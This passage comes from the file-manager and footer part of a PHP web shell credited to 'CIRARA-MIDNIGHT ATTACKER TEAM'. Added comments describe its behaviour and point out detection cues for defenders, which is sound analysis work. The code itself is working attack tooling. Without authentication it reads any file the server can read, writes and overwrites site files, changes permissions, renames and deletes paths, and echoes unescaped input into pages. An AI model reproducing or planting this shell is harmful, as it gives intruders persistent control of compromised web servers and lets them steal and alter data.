  589.               fputs($file_config,$ambil_config);
  590.             }
  591.           }
  592.         }    
  593.       }
  594.     }  
  595.   }
  596.   echo "<center><a href='?path=$path/syn_config'><font color=green>Done</font></a></center>";
  597. }
  // File manager header plus the "new file" / "new folder" actions, selected
  // with the `iac` query parameter.
  598. chdir($path);
  599. echo '<hr>File Manager / Change FTP || ';
  600. echo "[ <a href='?path=$path&iac=newfile'>File Baru</a> ]";
  601. echo "[ <a href='?path=$path&iac=newfolder'>Folder Baru</a> ]<hr>";
  602. if($_GET['iac'] == 'newfile') {
  // newfile: opens (and so creates) the POSTed file name in append mode.
  // htmlspecialchars() is applied to the name before fopen(); that is HTML
  // escaping, not a path restriction. The raw $_POST['newfile'] value is
  // then written into a <script> redirect unescaped.
  603.         echo "<hr>";
  604.   if($_POST['new_save_file']) {
  605.     $newfile = htmlspecialchars($_POST['newfile']);
  606.     $fopen = fopen($newfile, "a+");
  607.     if($fopen) {
  608.       $act = "<script>window.location='?act=edit&path=".$path."&file=".$_POST['newfile']."';</script>";
  609.     } else {
  610.       $act = "<font color=red>permission denied</font>";
  611.     }
  612.   }
  613.   echo $act;
  614.   echo "<form method='post'>
  615.  Filename: <input type='text' name='newfile' value='$path/newfile.php' style='width: 450px;' height='10'>
  616.  <input type='submit' name='new_save_file' value='Submit'>
  617.  </form>";
  618. } elseif($_GET['iac'] == 'newfolder') {
  // newfolder: mkdir() of <path>/<POSTed name>, with the same HTML escaping
  // applied to the name in place of any path check.
  619.         echo "<hr>";
  620.   if($_POST['new_save_folder']) {
  621.     $new_folder = $path.'/'.htmlspecialchars($_POST['newfolder']);
  622.     if(!mkdir($new_folder)) {
  623.       $act = "<font color=red>permission denied</font>";
  624.     } else {
  625.       $act = "<script>window.location='?path=".$path."';</script>";
  626.     }
  627.   }
  628.   echo $act;
  629.   echo "<form method='post'>
  630.  Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  631.  <input type='submit' name='new_save_folder' value='Submit'>
  632.  </form>";
  633. }
  // File viewer, per-entry operations and directory listing.
  // filesrc: prints the content of whatever path the query string names, so
  // any file readable by the web server account can be disclosed. The content
  // is HTML-escaped; the path itself is echoed unescaped.
  634. if(isset($_GET['filesrc'])){
  635. echo "<tr><td>Current File : ";
  636. echo $_GET['filesrc'];
  637. echo '</tr></td></table><br />';
  638. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  639. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  // chmod / rename / edit all act on $_POST['path'] as supplied, with no
  // restriction to a base directory. POSTed values are echoed back into the
  // page and into hidden form fields without HTML escaping.
  640. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  641. if($_POST['opt'] == 'chmod'){
  642. if(isset($_POST['perm'])){
  // The POSTed permission string is passed to chmod() as-is.
  643. if(chmod($_POST['path'],$_POST['perm'])){
  644. echo '<font color="green">Change Permission Berhasil</font><br/>';
  645. }else{
  646. echo '<font color="red">Change Permission Gagal</font><br />';
  647. }
  648. }
  649. echo '<form method="POST">
  650. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  651. <input type="hidden" name="path" value="'.$_POST['path'].'">
  652. <input type="hidden" name="opt" value="chmod">
  653. <input type="submit" value="Go" />
  654. </form>';
  655. }elseif($_POST['opt'] == 'rename'){
  656. if(isset($_POST['newname'])){
  657. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  658. echo '<font color="green">Ganti Nama Berhasil</font><br/>';
  659. }else{
  660. echo '<font color="red">Ganti Nama Gagal</font><br />';
  661. }
  662. $_POST['name'] = $_POST['newname'];
  663. }
  664. echo '<form method="POST">
  665. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  666. <input type="hidden" name="path" value="'.$_POST['path'].'">
  667. <input type="hidden" name="opt" value="rename">
  668. <input type="submit" value="Go" />
  669. </form>';
  670. }elseif($_POST['opt'] == 'edit'){
  // edit: overwrites the target file with the POSTed `src` content.
  // Defender note: this is how existing site files get modified in place, so
  // file-integrity monitoring of web roots is the relevant control.
  671. if(isset($_POST['src'])){
  672. $fp = fopen($_POST['path'],'w');
  673. if(fwrite($fp,$_POST['src'])){
  674. echo '<font color="green">Berhasil Edit File</font><br/>';
  675. }else{
  676. echo '<font color="red">Gagal Edit File</font><br/>';
  677. }
  678. fclose($fp);
  679. }
  680. echo '<form method="POST">
  681. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  682. <input type="hidden" name="path" value="'.$_POST['path'].'">
  683. <input type="hidden" name="opt" value="edit">
  684. <input type="submit" value="Save" />
  685. </form>';
  686. }
  687. echo '</center>';
  688. }else{
  // Default view: an optional delete (rmdir for type "dir", unlink for type
  // "file"), followed by the listing of $path.
  689. echo '</table><br/><center>';
  690. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  691. if($_POST['type'] == 'dir'){
  692. if(rmdir($_POST['path'])){
  693. echo '<font color="green">Directory Terhapus</font><br/>';
  694. }else{
  695. echo '<font color="red">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
  696. }
  697. }elseif($_POST['type'] == 'file'){
  698. if(unlink($_POST['path'])){
  699. echo 'File Terhapus</font><br/>';
  700. }else{
  701. echo '<font color="red">File Gagal Dihapus</font><br/>';
  702. }
  703. }
  704. }
  705. echo '</center>';
  // Listing: directories first, then files, each with its perms() string and
  // an action form. Entry names from scandir() are written into the HTML
  // unescaped.
  706. $scandir = scandir($path);
  707. echo '<div><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  708. <tr class="first">
  709. <td><center>Name</peller></center><hr></td>
  710. <td><center>Size</peller></center><hr></td>
  711. <td><center>Permission</peller></center><hr></td>
  712. <td><center>Modify</peller></center><hr></td>
  713. </tr>';
  714.  
  715. foreach($scandir as $dir){
  716. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  717. echo '<tr>
  718. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a><hr></td>
  719. <td><center>--</center></td>
  720. <td><center>';
  // Green when writable, red when unreadable, default colour otherwise.
  721. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  722. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  723. echo perms($path.'/'.$dir);
  724. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  725.  
  726. echo '</center></td>
  727. <td><center><form method="POST" action="?option&path='.$path.'">
  728. <select name="opt">
  729. <option value="">Select</option>
  730. <option value="delete">Delete</option>
  731. <option value="chmod">Chmod</option>
  732. <option value="rename">Rename</option>
  733. </select>
  734. <input type="hidden" name="type" value="dir">
  735. <input type="hidden" name="name" value="'.$dir.'">
  736. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  737. <input type="submit" value=">">
  738. </form></center></td>
  739. </tr>';
  740. }
  741. echo '<tr><td></td><td></td><td></td><td></td></tr>';
  742. foreach($scandir as $file){
  743. if(!is_file($path.'/'.$file)) continue;
  // Size is shown in KB, or in MB once it reaches 1024 KB.
  744. $size = filesize($path.'/'.$file)/1024;
  745. $size = round($size,3);
  746. if($size >= 1024){
  747. $size = round($size/1024,2).' MB';
  748. }else{
  749. $size = $size.' KB';
  750. }
  751.  
  752. echo '<tr>
  753. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  754. <td><center>'.$size.'</center></td>
  755. <td><center>';
  756. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  757. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  758. echo perms($path.'/'.$file);
  759. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  760. echo '</center></td>
  761. <td><center><form method="POST" action="?option&path='.$path.'">
  762. <select name="opt">
  763. <option value="">Select</option>
  764. <option value="delete">Delete</option>
  765. <option value="chmod">Chmod</option>
  766. <option value="rename">Rename</option>
  767. <option value="edit">Edit</option>
  768. </select>
  769. <input type="hidden" name="type" value="file">
  770. <input type="hidden" name="name" value="'.$file.'">
  771. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  772. <input type="submit" value=">">
  773. </form></center></td>
  774. </tr>';
  775. }
  776. echo '</table>
  777. </div>';
  778. }
  // Footer: author attribution text and two outbound links. Both anchors
  // wrap only an empty <font> tag, so the links carry no visible text. The
  // attribution string and the two host names are further candidates for
  // content matching when scanning web roots.
  779. echo "<hr><center><a href='https://midnight-attacker.blogspot.com' target='_blank'><font size='3px'></a> CODED BY CIRARA-MIDNIGHT ATTACKER TEAM <a href='http://midnight-attacker.eu5.net' target='_blank'><font size='3px'></a><hr>
  780. </body>
  781. </html>";
  782. ?>